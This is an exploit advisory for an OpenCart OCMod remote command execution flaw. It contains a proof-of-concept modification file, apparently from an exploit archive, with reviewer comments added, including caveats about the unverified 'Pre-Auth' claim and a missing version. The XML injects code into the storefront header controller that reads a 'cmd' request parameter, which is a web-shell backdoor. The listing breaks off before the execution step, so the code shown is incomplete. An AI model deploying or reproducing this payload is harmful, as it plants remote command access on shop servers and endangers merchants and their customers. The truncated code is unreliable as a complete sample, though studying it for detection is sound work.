Opencart Insecure OCMod Generation Remote Command Execution

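Opencart versions up to and including an affected release (the version number is missing from this page) suffer from an insecure OCMod generation remote command execution vulnerability. The proof of concept below is an OCMod modification file that patches catalog/controller/common/header.php. The page does not show how the file reaches the store's modification installer, which is normally an administrator function, so the "Pre-Auth" label used in the file's comments should be verified before it is used to rate the issue.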

MD5 | 6fe443a1799c4db7980052fb9c608ef3

<?xml version="1.0" encoding="utf-8"?>

<!-- Opencart <= Insecure OCMod Generation Pre-Auth RCE -->

<!-- Copyright 2019 (c) Todor Donev <todor.donev at> -->

<!-- Disclaimer: -->

<!-- This or previous programs is for Educational -->
<!-- purpose ONLY. Do not use it without permission. -->
<!-- The usual disclaimer applies, especially the -->
<!-- fact that Todor Donev is not liable for any -->
<!-- damages caused by direct or indirect use of the -->
<!-- information or functionality provided by these -->
<!-- programs. The author or any Internet provider -->
<!-- bears NO responsibility for content or misuse -->
<!-- of these programs or any derivatives thereof. -->
<!-- By using these programs you accept the fact -->
<!-- that any damage (dataloss, system crash, -->
<!-- system compromise, etc.) caused by the use -->
<!-- of these programs is not Todor Donev's -->
<!-- responsibility. -->

<!-- Use them at your own risk! -->

<!-- NOTES: This file must be - oc2302_preauth_rce.ocmod.xml -->

<!-- Modification metadata: display name, code, author and contact link. -->
<!-- <name> and <code> carry the same string; both values sit in CDATA -->
<!-- because the text contains a literal "<". -->
<!-- NOTE(review): in OCMod the <code> value is presumably the identifier an -->
<!-- installed modification is tracked by, which would make this string the -->
<!-- thing to look for when auditing a store's installed modifications - -->
<!-- confirm against the OpenCart release in use. -->
<!-- NOTE(review): no enclosing root element and no version element are -->
<!-- shown on this page before these lines; the listing may be incomplete. -->
<name><![CDATA[Opencart <= Insecure OCMod Generation Pre-Auth RCE]]></name>
<code><![CDATA[Opencart <= Insecure OCMod Generation Pre-Auth RCE]]></code>
<author>Todor Donev</author>
<!-- NOTE(review): the address below looks masked by the hosting page's -->
<!-- e-mail protection rather than being the author's original value. -->
<link>mailto:[email protected]</link>

<file path="catalog/controller/common/header.php">
<search><![CDATA[// For page specific css]]></search>
<add position="before"><![CDATA[ if(isset($this->request->get['cmd'])){
echo "<pre>";
$cmd = ($this->request->get['cmd']);
echo "</pre>";

